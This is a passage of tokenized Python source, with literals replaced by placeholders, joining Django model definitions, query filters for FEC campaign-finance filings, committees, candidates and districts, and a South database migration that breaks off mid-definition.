"<STR_LIT>" % ( self . url [ : <NUM_LIT:15> ] , self . url [ - <NUM_LIT:15> : ] ) <EOL> return "<STR_LIT>" % ( url , self . created . isoformat ( ) ) <EOL> class ViewLog ( models . Model ) : <EOL> firm = models . ForeignKey ( Firm ) <EOL> session = models . ForeignKey ( Session ) <EOL> bio_pages = ArrayField ( models . URLField ( ) , blank = True ) <EOL> non_bio_pages = ArrayField ( models . URLField ( ) , blank = True ) <EOL> created = models . DateTimeField ( auto_now_add = True ) <EOL> suspect = models . BooleanField ( default = False ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . firm . domain , self . created . isoformat ( ) ) <EOL> class CollectionSettings ( models . Model ) : <EOL> user = models . OneToOneField ( User ) <EOL> is_test_user = models . BooleanField ( default = False ) <EOL> is_assigned_user = models . BooleanField ( default = False ) <EOL> def __str__ ( self ) : <EOL> return str ( self . user ) <EOL> @ receiver ( post_save , sender = User ) <EOL> def ensure_settings ( sender , instance , created , ** kwargs ) : <EOL> CollectionSettings . objects . get_or_create ( user = instance ) <EOL> class Assignment ( models . Model ) : <EOL> user = models . ForeignKey ( User ) <EOL> firm = models . ForeignKey ( Firm ) <EOL> complete = models . BooleanField ( default = False ) </s>
<s> import django_filters <EOL> from datetime import date , timedelta <EOL> from fec_alerts . models import new_filing <EOL> from summary_data . models import Committee_Overlay , Authorized_Candidate_Committees , DistrictWeekly , District , Candidate_Overlay <EOL> from formdata . models import SkedE <EOL> from django . db . models import Q <EOL> from summary_data . utils . weekly_update_utils import get_week_number <EOL> class NFFilter ( django_filters . FilterSet ) : <EOL> min_raised = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> min_spent = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> min_coh = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> filed_before = django_filters . DateFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> filed_after = django_filters . DateFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = new_filing <EOL> fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class COFilter ( django_filters . FilterSet ) : <EOL> min_raised = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> min_spent = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> min_coh = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = Committee_Overlay <EOL> fields = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class OSFilter ( django_filters . FilterSet ) : <EOL> min_ies = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = Committee_Overlay <EOL> fields = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class DistrictFilter ( django_filters . FilterSet ) : <EOL> class Meta : <EOL> model = District <EOL> fields = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class CandidateFilter ( django_filters . FilterSet ) : <EOL> class Meta : <EOL> model = Candidate_Overlay <EOL> fields = [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class DWFilter ( django_filters . FilterSet ) : <EOL> week_start = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> week_end = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = DistrictWeekly <EOL> fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class SkedEFilter ( django_filters . FilterSet ) : <EOL> min_spent = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = SkedE <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def yearFilter ( queryset , querydict ) : <EOL> try : <EOL> year = int ( querydict [ '<STR_LIT>' ] ) <EOL> queryset = queryset . filter ( Q ( coverage_from_date__gte = date ( year , <NUM_LIT:1> , <NUM_LIT:1> ) , coverage_to_date__lte = date ( year , <NUM_LIT:12> , <NUM_LIT> ) ) ) <EOL> except ( KeyError , ValueError ) : <EOL> pass <EOL> return queryset <EOL> def DWDistrictFilter ( queryset , querydict ) : <EOL> try : <EOL> district_list = querydict [ '<STR_LIT>' ] <EOL> if district_list . find ( '<STR_LIT:U+002C>' ) < <NUM_LIT:0> : <EOL> queryset = queryset . filter ( district__pk = district_list ) <EOL> else : <EOL> district_ids = district_list . split ( '<STR_LIT:U+002C>' ) <EOL> queryset = queryset . filter ( district__pk__in = district_ids ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def candidatedistrictFilter ( queryset , querydict ) : <EOL> try : <EOL> id = int ( querydict [ '<STR_LIT>' ] ) <EOL> queryset = queryset . filter ( district__pk = id ) <EOL> except ( KeyError , ValueError ) : <EOL> pass <EOL> return queryset <EOL> def districtIDFilter ( queryset , querydict ) : <EOL> try : <EOL> id = int ( querydict [ '<STR_LIT>' ] ) <EOL> queryset = queryset . filter ( pk = id ) <EOL> except ( KeyError , ValueError ) : <EOL> pass <EOL> return queryset <EOL> def weekFilter ( queryset , querydict ) : <EOL> try : <EOL> week = querydict [ '<STR_LIT>' ] <EOL> if week . upper ( ) == "<STR_LIT>" : <EOL> queryset = queryset . filter ( cycle_week_number = get_week_number ( date . today ( ) ) ) <EOL> if week . upper ( ) == "<STR_LIT>" : <EOL> queryset = queryset . filter ( cycle_week_number = get_week_number ( date . today ( ) ) - <NUM_LIT:1> ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def periodTypeFilter ( queryset , querydict ) : <EOL> try : <EOL> period_type = querydict [ '<STR_LIT>' ] <EOL> if period_type . startswith ( '<STR_LIT>' ) : <EOL> if period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:1> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:3> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:4> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:6> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:7> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:9> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:10> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:12> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type . startswith ( '<STR_LIT:M>' ) : <EOL> if period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:1> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:1> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( Q ( coverage_from_date__month = <NUM_LIT:2> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:2> , coverage_to_date__day = <NUM_LIT> ) | Q ( coverage_from_date__month = <NUM_LIT:2> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:2> , coverage_to_date__day = <NUM_LIT> ) ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:3> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:3> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:4> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:4> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:5> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:5> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:6> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:6> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:7> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:7> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:8> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:8> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:9> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:9> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:10> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:10> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:11> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:11> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:12> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:12> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( Q ( coverage_from_date = date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:1> ) , coverage_to_date = date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:15> ) ) ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( Q ( coverage_from_date = date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:16> ) , coverage_to_date = date ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT> ) ) ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_to_date = date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> elif period_type . startswith ( '<STR_LIT:S>' ) : <EOL> if period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:1> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:6> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:7> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:12> , coverage_to_date__day = <NUM_LIT> ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def reportTypeFilter ( queryset , querydict ) : <EOL> try : <EOL> report_type = querydict [ '<STR_LIT>' ] <EOL> if report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def orderingFilter ( queryset , querydict , fields ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ordering = querydict [ '<STR_LIT>' ] <EOL> if ordering . lstrip ( '<STR_LIT:->' ) in fields : <EOL> orderlist = [ ordering ] <EOL> queryset = queryset . order_by ( * orderlist ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def committeeSearchSlow ( queryset , querydict ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> search_term = querydict [ '<STR_LIT>' ] <EOL> queryset = queryset . filter ( committee_name__icontains = search_term ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def candidateidSearch ( queryset , querydict ) : <EOL> try : <EOL> candidate_id = querydict [ '<STR_LIT>' ] <EOL> authorized_committee_list = Authorized_Candidate_Committees . objects . filter ( candidate_id = candidate_id ) <EOL> committee_list = [ x . get ( '<STR_LIT>' ) for x in authorized_committee_list . values ( '<STR_LIT>' ) ] <EOL> queryset = queryset . filter ( fec_id__in = committee_list ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def filingTimeFilter ( queryset , querydict ) : <EOL> try : <EOL> time_range = querydict [ '<STR_LIT>' ] <EOL> if time_range == '<STR_LIT>' : <EOL> today = date . today ( ) <EOL> queryset = queryset . filter ( filed_date = today ) <EOL> elif time_range == '<STR_LIT>' : <EOL> today = date . today ( ) <EOL> one_week_ago = today - timedelta ( days = <NUM_LIT:7> ) <EOL> queryset = queryset . filter ( filed_date__gte = one_week_ago ) <EOL> elif time_range == '<STR_LIT>' : <EOL> queryset = queryset . filter ( filed_date__gte = date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) , filed_date__lte = date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> elif time_range == '<STR_LIT>' : <EOL> queryset = queryset . filter ( filed_date__gte = date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) , filed_date__lte = date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def multiCommitteeTypeFilter ( queryset , querydict ) : <EOL> try : <EOL> committee_class = querydict [ '<STR_LIT>' ] <EOL> committee_class = committee_class . upper ( ) <EOL> if committee_class == '<STR_LIT>' : <EOL> queryset = queryset . filter ( committee_designation = committee_class ) <EOL> elif committee_class == '<STR_LIT:L>' : <EOL> queryset = queryset . filter ( committee_designation = '<STR_LIT:D>' ) <EOL> else : <EOL> committee_type_list = list ( committee_class ) <EOL> queryset = queryset . filter ( committee_type__in = committee_type_list ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def multiCTypeFilter ( queryset , querydict ) : <EOL> try : <EOL> committee_class = querydict [ '<STR_LIT>' ] <EOL> committee_class = committee_class . upper ( ) <EOL> if committee_class == '<STR_LIT>' : <EOL> queryset = queryset . filter ( designation = committee_class ) <EOL> elif committee_class == '<STR_LIT:L>' : <EOL> queryset = queryset . filter ( designation = '<STR_LIT:D>' ) <EOL> else : <EOL> committee_type_list = list ( committee_class ) <EOL> queryset = queryset . filter ( ctype__in = committee_type_list ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def candidateCommitteeSearchSlow ( queryset , querydict ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> search_term = querydict [ '<STR_LIT>' ] <EOL> queryset = queryset . filter ( Q ( name__icontains = search_term ) | Q ( curated_candidate__name__icontains = search_term ) ) <EOL> except KeyError : <EOL> pass <EOL> return queryset </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> , null = True , max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:{}>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:{}>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:3>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:4>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : 